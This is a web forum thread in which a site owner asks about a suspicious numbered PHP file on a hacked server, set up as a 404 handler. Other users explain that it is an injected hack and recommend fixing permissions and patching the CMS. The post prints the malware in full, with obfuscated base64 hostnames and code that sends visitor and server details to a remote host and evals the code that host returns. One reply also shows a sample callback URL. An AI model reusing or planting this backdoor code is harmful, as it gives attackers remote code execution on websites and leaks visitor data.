PHP question

[Bunchadogs]

My Google searches are failing me....

Can anyone breifly explain this:
231399.php

<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="d0c9eabef93eb1390142aca4d58ae7b6") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};
die(); ?>

referenced from this .htaccess entry:

Options -MultiViews
ErrorDocument 404 //main/components/231399.php

Thanks!

 

[Stephen]

looks like you had some permissions set wrong and this is a roundabout hack that rouge people use to 'enhance' their SEO on pages they don't control

I'd recommend removing 777 permissions if you have them there.

 

[skypanther]

@Bunchadogs - That looks to me like the sort of thing that has been uploaded to my sites by hackers.

What that code is doing is calling the following URL (spaces added by me to prevent it becoming a link in these forums) and including its output in your page.
http://ads3. phpsearch. cn/?bG9jYWxob3N0.bG9jYWxob3N0.L3JvY2hlc3RlcmV2ZW50cy9mb28ucGhw.L3JvY2hlc3RlcmV2ZW50cy9mb28ucGhw...TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS45LjAuMTApIEdlY2tvLzIwMDkwNDIzMTYgRmlyZWZveC8zLjAuMTA=.MTI3LjAuMC4x.e.Qzovd2FtcC93d3cvcm9jaGVzdGVyZXZlbnRzL2Zvby5waHA=.ZW4tdXMsZW47cT0wLjU=

This is a site in China. The die() at the end prevents any other stuff from showing.

The file name being a number is sort of what clued me in to this. All the uploaded hacked files on my sites have been named with numbers like this.

Check your CMS for security updates. And older version of FCKEditor's file upload component (a Java applet) was the security hole in my case. Change your directory permissions as Stephen noted. Delete any numbered files like this.

Tim

 

[Stephen]

fckeditor older versions had a number of nasty bugs like this, people like to use them to make phishing pages as well, evil things...

 

[Bunchadogs]

I did have quite a few 777 folders - I would assume 755 is secure enough?

Just finished patching a number of Joomla installs up to the latest version...I'll have to double check the editor since I know a number of extensions load the JCE editor for Joomla.

Interesting side note - I spent a day cleaning all of these files from a ton of directories on a site. However I DIDN'T reset the permissions or apply any patches.

I got busy and didn't get around to finishing the job until the next day - actually about 14 hours later...too bad ALL the files were back! That's some pretty effecient hacking! :evil:

Obviously this time I fixed permsions and patched first, and followed up with the cleaning. It's been several days now and all seems to be stable again.